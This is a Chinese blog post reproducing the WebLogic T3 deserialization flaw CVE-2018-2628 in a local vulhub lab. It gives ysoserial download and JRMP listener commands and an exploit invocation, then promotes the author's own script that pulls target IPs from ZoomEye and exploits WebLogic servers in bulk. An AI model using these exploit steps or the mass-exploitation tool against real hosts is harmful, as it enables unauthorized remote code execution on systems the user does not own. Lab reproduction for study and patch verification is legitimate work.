Weblogic deserialization vulnerability recurrence (CVE-2018-2628)

  1. 前言
  2. 正文

前言


复现CVE-2018-2628的反序列化漏洞,正好还欠慕慕一个对应的利用脚本。随便就一起搞了,搭建这个靶场可真的是耗费时间= =

7ce9bee1c06544e8992b78c0a1b29dff.jpg

BGM 方圆几里:

正文


首先去vulhub下好对应的项目,进入对应的文件夹,执行:

docker-compose up -d

搭建好环境后,访问:127.0.0.1:7001
出现以下:
ksQKVH.png

漏洞介绍

Oracle 2018年4月补丁中,修复了Weblogic Server WLS Core Components中出现的一个反序列化漏洞(CVE-2018-2628),该漏洞通过t3协议触发,可导致未授权的用户在远程服务器执行任意命令。

漏洞复现
下载对应的利用工具:

wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
copy里面的利用代码https://www.exploit-db.com/exploits/44553

利用:
启动一个JRMP Server:

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]

listen port=监听的端口
command=你要执行的命令

例子:java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1001 CommonsCollections1 'touch /haq520'

kstj2j.png

发送exploit


python exp.py 127.0.0.1 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 127.0.0.1 1099 JRMPClient

结果:
ksNaeP.png

实战
上面说了欠慕慕一个脚本,这里下午写完。放入了仓库
python/weblogic反序列化批量利用 at master · 422926799/python · GitHub

说明:
weblogic反序列化批量利用,可通过网页关键字判断是否weblogic服务,批量检测或单个检测,判断7001端口是否开放,可从zoomeye抓取IP,请自行配置config文件夹里面的search.ini,填写zoomeye的user和pwd。

测试结果:
ksNszj.png

ksNTSJ.png

转载请声明:转自422926799.github.io


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。

文章标题:Weblogic deserialization vulnerability recurrence (CVE-2018-2628)

本文作者:九世

发布时间:2019-02-16, 16:38:27

最后更新:2019-04-19, 20:36:16

原始链接:http://jiushill.github.io/posts/5a7054a8.html

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录